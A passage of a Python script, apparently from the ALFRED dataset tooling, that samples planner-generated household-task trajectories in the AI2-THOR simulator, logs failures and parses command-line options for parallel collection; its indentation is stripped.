constraint_objs['empty'] = [
(r.replace('Basin', ''), num_place_fails * constants.RECEPTACLE_EMPTY_POINTS)
for r in goal_to_invalid_receptacle[gtype]
]
# turn off the lights if task needs it
constraint_objs['seton'] = []
if gtype == 'look_at_obj_in_light':
constraint_objs['seton'].append((receptacle_obj, False))
# alert user that scene is now sparser if last try failed
if num_place_fails > 0:
print("Failed %d placements in the past; increased free point constraints: " % num_place_fails
+ str(constraint_objs))
# thor env spawn up the scene according to constraint objs
scene_info = {'scene_num': int(scene_num), 'random_seed': seed}
info = agent.reset(scene=scene_info, objs=constraint_objs)
# initialize problem definition for pddl planner
task_objs = {'pickup': pickup_obj}
if movable_obj != "None":
task_objs['mrecep'] = movable_obj
if gtype == "look_at_obj_in_light":
task_objs['toggle'] = receptacle_obj
else:
task_objs['receptacle'] = receptacle_obj
# specific object instances (with ID) are chosen for pickup and receptacle targets
agent.setup_problem({'info': info}, scene=scene_info, objs=task_objs)
# start recording metadata for positions of objects
object_poses = [{'objectName': obj['name'].split('(Clone)')[0],
'position': obj['position'],
'rotation': obj['rotation']}
for obj in env.last_event.metadata['objects'] if obj['pickupable']]
dirty_and_empty = gtype == 'pick_clean_then_place_in_recep'
object_toggles = [{'objectType': o, 'isOn': v}
for o, v in constraint_objs['seton']]
constants.data_dict['scene']['object_poses'] = object_poses
constants.data_dict['scene']['dirty_and_empty'] = dirty_and_empty
constants.data_dict['scene']['object_toggles'] = object_toggles
# reinitialize the scene, in case THOR was updated, a different random seed wouldn't mess up these scenes.
print("Performing reset via thor_env API")
env.reset(int(scene_num))
print("Performing restore via thor_env API")
env.restore_scene(object_poses, object_toggles, dirty_and_empty)
# send agent into the scene at an initial pos
event = env.step(dict(constants.data_dict['scene']['init_action']))
# compute the plan and execute it
terminal = False
while not terminal and agent.current_frame_count <= constants.MAX_EPISODE_LENGTH:
# 1. agent get plan from solver -- ff_planner_handler.py get_plan_from_file()
# 2. agent step in thor env -- plan_agent.py self.controller_agent.step()
action_dict = agent.get_action(None)
agent.step(action_dict)
reward, terminal = agent.get_reward()
# dump constants.data_dict to file
dump_data_dict()
# save images in images_path to video_path
save_video()
# book keeping
sampled_traj_dirs['successes'][seed] = task_root
except Exception as e:
# report error in stdout
import traceback
traceback.print_exc()
sampled_traj_dirs['fails'][seed] = task_root
dump_data_dict()
if str(e) == "API Action Failed: No valid positions to place object found":
num_place_fails += 1
estr = str(e)
if len(estr) > 120:
estr = estr[:120]
if estr not in errors:
errors[estr] = 0
errors[estr] += 1
print("%%%%%%%%%%")
es = sum([errors[er] for er in errors])
print("\terrors (%d):" % es)
for er, v in sorted(errors.items(), key=lambda kv: kv[1], reverse=True):
if v / es < 0.01: # stop showing below 1% of errors.
break
print("\t(%.2f) (%d)\t%s" % (v / es, v, er))
print("%%%%%%%%%%")
finally:
tries_remaining -= 1
target_remaining = args.repeats_per_cond - count_successes_from_disk(task_tuple)
# optionally delete directory for successful tasks.
if args.force_unsave_successes:
delete_save(args.in_parallel)
print("---------------End of Sampling----------------")
print((gtype, pickup_obj, movable_obj, receptacle_obj, str(scene_num)))
print(
'Finished a maximum of {} trials, with {} fails.'.format(
args.trials_before_fail, sum([errors[er] for er in errors])
)
)
# if this combination resulted in a certain number of failures with no successes, flag it as not possible.
if tries_remaining == 0 and target_remaining == args.repeats_per_cond:
print('The specified tuple is too hard to sample any successful trajectories.')
return sampled_traj_dirs, errors
def main(args, task_names_dict, process_i=0):
if args.seed is not None:
# keep agent start pos always the same
# keep the way object varies across trials predictable
np.random.seed(args.seed)
# ---------------------Setup Scene and Object Candidates------------------------
# objects-to-scene and scene-to-objects database
for scene_type, ids in constants.SCENE_TYPE.items():
for id in ids:
obj_json_file = os.path.join('layouts', 'FloorPlan%d-objects.json' % id)
with open(obj_json_file, 'r') as of:
scene_objs = json.load(of)
id_str = str(id)
scene_id_to_objs[id_str] = scene_objs
for obj in scene_objs:
if obj not in obj_to_scene_ids:
obj_to_scene_ids[obj] = set()
obj_to_scene_ids[obj].add(id_str)
# scene-goal database
for g in constants.GOALS:
for st in constants.GOALS_VALID[g]:
scenes_for_goal[g].extend([str(s) for s in constants.SCENE_TYPE[st]])
scenes_for_goal[g] = set(scenes_for_goal[g])
# scene-type database
for st in constants.SCENE_TYPE:
for s in constants.SCENE_TYPE[st]:
scene_to_type[str(s)] = st
# Union objects that can be placed.
pickup_candidates = list(
set().union(*[constants.VAL_RECEPTACLE_OBJECTS[obj] for obj in constants.VAL_RECEPTACLE_OBJECTS])
)
pickup_candidates = [p for p in pickup_candidates if constants.OBJ_PARENTS[p] in obj_to_scene_ids]
# objects that can be used as receptacle
receptacle_candidates = [obj for obj in constants.VAL_RECEPTACLE_OBJECTS
if obj not in constants.MOVABLE_RECEPTACLES and obj in obj_to_scene_ids] + \
[obj for obj in constants.VAL_ACTION_OBJECTS["Toggleable"]
if obj in obj_to_scene_ids]
# toaster isn't interesting in terms of producing linguistic diversity
receptacle_candidates.remove('Toaster')
receptacle_candidates.sort()
# ---------------------Setup Env and Agent--------------------------------------
# create env and agent
env = ThorEnv()
game_state = TaskGameStateFullKnowledge(env)
agent = DeterministicPlannerAgent(thread_id=0, game_state=game_state)
# ---------------------Sample the tasks one by one------------------------------
dont_sample_scenes = VALID_UNSEEN_SCENES | TEST_SEEN_SCENES | TEST_UNSEEN_SCENES
for curr_task_name in progressbar.progressbar(task_names_dict[process_i]):
# construct task tuple
task_tuple = curr_task_name.split('-')
# filter out unseen and test environments
if task_tuple[-1] in dont_sample_scenes:
continue
# call sample_task_trajs
sampled_traj_dirs, errors = sample_task_trajs(
args, task_tuple, agent, env, obj_to_scene_ids, scene_id_to_objs, pickup_candidates, {})
# save the directory paths for success and failed trajectories,
# and error counts to disk
save_bookkeeping_and_splits(
curr_task_name, constants.DATA_SAVE_PATH, args.splits_dir,
sampled_traj_dirs, errors, process_i)
def parallel_main(args):
procs = [
mp.Process(target=main, args=(args, task_names_dict, process_i)) for process_i in range(args.num_processes)
]
try:
for proc in procs:
proc.start()
time.sleep(0.1)
finally:
for proc in procs:
proc.join()
subprocess.call(["pkill", "-f", 'thor'])
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# save settings
parser.add_argument(
'--force_unsave_successes', action='store_true',
help="don't save any data for successful traj (for debugging purposes)"
)
parser.add_argument(
'--data_root', type=str, help="top data directory \
e.g. /data_alfred/", required=True
)
parser.add_argument(
'--save_subdir', type=str, help="subdirectory to save the success & failure trajectories and data, \
e.g. sampled/new_trajectories/", required=True
)
parser.add_argument(
'--splits_dir', type=str, help="where to save the split file",
default='/root/data_alfred/splits/', required=True
)
# debugging settings
parser.add_argument(
'--debug', action='store_true',
help="print agent env actions info per timestep."
)
parser.add_argument(
'--x_display', type=str, required=False, default=constants.X_DISPLAY, help="x_display id"
)
# multi-process settings
parser.add_argument(
"--in_parallel", action='store_true',
help="this collection will run in parallel with others, so load from disk on every new sample"
)
parser.add_argument(
"-n", "--num_processes", type=int, default=0,
help="number of processes for parallel mode"
)
# task params from list of previously failed trajectories
parser.add_argument(
'--task_names_path', type=str, required=True,
help="path to text file. each line is a task name e.g. look_at_obj_in_light-BaseballBat-None-DeskLamp-301"
)
# number of tries
parser.add_argument(
"--repeats_per_cond", type=int,
help='number of successful trajectories we want to collect for each task tuple.',
default=3
)
parser.add_argument(
"--trials_before_fail", type=int,
help='number of tries before we stop trying for the task tuple. (some task tuples can be very challenging.)',
default=5
)
parse_args = parser.parse_args()
parse_args.seed = None
# each trajectory directory is time stamped by the moment we start collecting them
constants.TIME_NOW = parse_args.save_subdir.rstrip('/')[-8:]
parse_args.save_path = os.path.join(parse_args.data_root, parse_args.save_subdir)
constants.DATA_SAVE_PATH = parse_args.save_path
start_time = time.time()
# get task_names from of previously failed tasks from file
with open(parse_args.task_names_path, 'r') as f:
task_names_list = f.read().splitlines()
os.makedirs(parse_args.save_path, exist_ok=True)
task_names_dict = {}
if parse_args.in_parallel and parse_args.num_processes > 1:
# divide task among processes
# TODO: should replace with a proper queue for multi-process
quotient = len(task_names_list) // parse_args.num_processes
for process_i in range(parse_args.num_processes):
task_names_dict[process_i] = task_names_list[process_i*quotient: (process_i+1)*quotient]
if process_i == parse_args.num_processes-1:
task_names_dict[process_i] += task_names_list[(process_i+1)*quotient:]
parallel_main(parse_args)
merge_process_results(parse_args)
else:
task_names_dict[0] = task_names_list
main(parse_args, task_names_dict)
merge_process_results(parse_args)
print('-------------------------------------------------------')
print("Finished sampling, total time:")
print(time.time() - start_time)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.